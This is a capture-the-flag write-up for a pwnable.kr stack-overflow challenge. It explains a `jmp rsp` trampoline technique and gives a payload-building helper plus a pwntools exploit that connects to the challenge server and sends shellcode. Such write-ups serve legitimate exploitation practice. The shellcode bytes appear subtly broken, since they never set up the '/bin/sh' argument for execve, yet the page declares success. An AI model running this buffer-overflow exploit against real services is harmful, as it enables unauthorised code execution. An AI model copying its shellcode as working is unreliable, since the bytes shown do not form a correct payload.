Writeup - pwnable.kr
Knowing that we have a stack overflow and that the return address sits on the stack, the plan has two steps. First, write a `jmp rsp` instruction into the name buffer, which lives at a fixed address (0x6020a0 in the exploit below), so there is a trampoline at a known location. Second, use the overflow to overwrite the saved return address with exactly that buffer address, and place the shellcode immediately after it. When the function executes `ret`, it pops the trampoline address into rip and leaves rsp pointing at the byte right after the return slot, i.e. at the shellcode; `jmp rsp` then jumps straight into it. PWNED.
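The following is an added illustration, not code from the writeup: it rebuilds the stage-2 payload layout described above without pwntools, so the frame arithmetic can be checked offline before touching the target. The 40-byte distance from the buffer to the saved return address, the trampoline address 0x6020a0 and the shellcode bytes are taken from the exploit on this page; the `simulate_ret` model and the newline check are assumptions added here (the check only matters if the target reads input line by line, which this example assumes).

```python
import struct

# Hand-assembled x86-64 `jmp rsp`: opcode FF /4 with ModRM 0xE4 selecting rsp.
# These are the same two bytes pwntools' asm("jmp rsp", arch="amd64") emits.
JMP_RSP = b"\xff\xe4"

# Values taken from the exploit on this page.
TRAMPOLINE_ADDR = 0x6020A0          # fixed address of the name buffer
RET_OFFSET = 40                     # bytes from buffer start to the saved return address
SHELLCODE = (b"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48"
             b"\x48\x31\xf6\x48\x31\xd2\x0f\x05")


def p64(value):
    """Pack a 64-bit little-endian value (equivalent of pwntools' p64)."""
    return struct.pack("<Q", value)


def build_stage2(trampoline_addr, shellcode, ret_offset):
    """Build the overflow payload for the second input.

    Layout, low to high addresses, as it ends up on the stack:
        [ret_offset bytes of filler][trampoline_addr][shellcode]
    `ret` pops trampoline_addr into rip and leaves rsp on the first
    shellcode byte, which is exactly where `jmp rsp` lands.
    """
    filler = b"A" * ret_offset
    return filler + p64(trampoline_addr) + shellcode


def simulate_ret(payload, ret_offset):
    """Model (assumed here) of what `ret` does on the smashed frame.

    Returns (new rip, bytes that rsp points at after the pop).
    """
    rip = struct.unpack_from("<Q", payload, ret_offset)[0]
    at_rsp = payload[ret_offset + 8:]
    return rip, at_rsp


def delivery_problems(payload, terminators=(b"\n",)):
    """Return the input terminators found inside the payload.

    Assumption: the payload is delivered with sendline() to a line-based
    read, so an embedded newline would cut the payload short. The address
    0x6020a0 contains NUL bytes, which are fine for read()-style input but
    would truncate a strcpy()-style copy; add b"\\x00" to `terminators`
    to check for that case too.
    """
    return [t for t in terminators if t in payload]


def example_payload():
    """Stage-2 payload with the page's values (trampoline at 0x6020a0)."""
    return build_stage2(TRAMPOLINE_ADDR, SHELLCODE, RET_OFFSET)


if __name__ == "__main__":
    payload = example_payload()
    rip, at_rsp = simulate_ret(payload, RET_OFFSET)
    print("stage 1 (name buffer):", JMP_RSP.hex())
    print("stage 2 payload      :", payload.hex())
    print("rip after ret        : 0x%x" % rip)
    print("rsp points at shellcode:", at_rsp == SHELLCODE)
    print("delivery problems     :", delivery_problems(payload))
```

Run it once with the real offsets before sending anything: if `simulate_ret` does not report the trampoline address and the shellcode at rsp, the padding length is wrong and the live attempt will just crash.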
Exploit
```python
# Python 2 era pwntools; under Python 3 every string sent below must be bytes.
from pwn import *
import time

context.log_level = 'debug'
p = remote("pwnable.kr", 9010)
#p = process('./echo1')
#gdb.attach(p, '''
#break *0x0000000000400818
#continue
#''')

# shellcode bytes as printed in the writeup
shellcode = "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05"

# stage 1: the name buffer (fixed address 0x6020a0) receives the `jmp rsp` trampoline
p.recvuntil("hey, what's your name?")
p.sendline(asm("jmp rsp", arch='amd64', os='linux'))

# stage 2: choose the vulnerable echo, then overflow 40 bytes up to the saved
# return address, overwrite it with the buffer address (little-endian 0x6020a0)
# and append the shellcode so that rsp points at it after `ret`
p.recvuntil(">")
p.sendline("1")
sleep(1)
p.sendline("AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG" + "\xa0\x20\x60\x00\x00\x00\x00\x00" + shellcode)
p.interactive()
```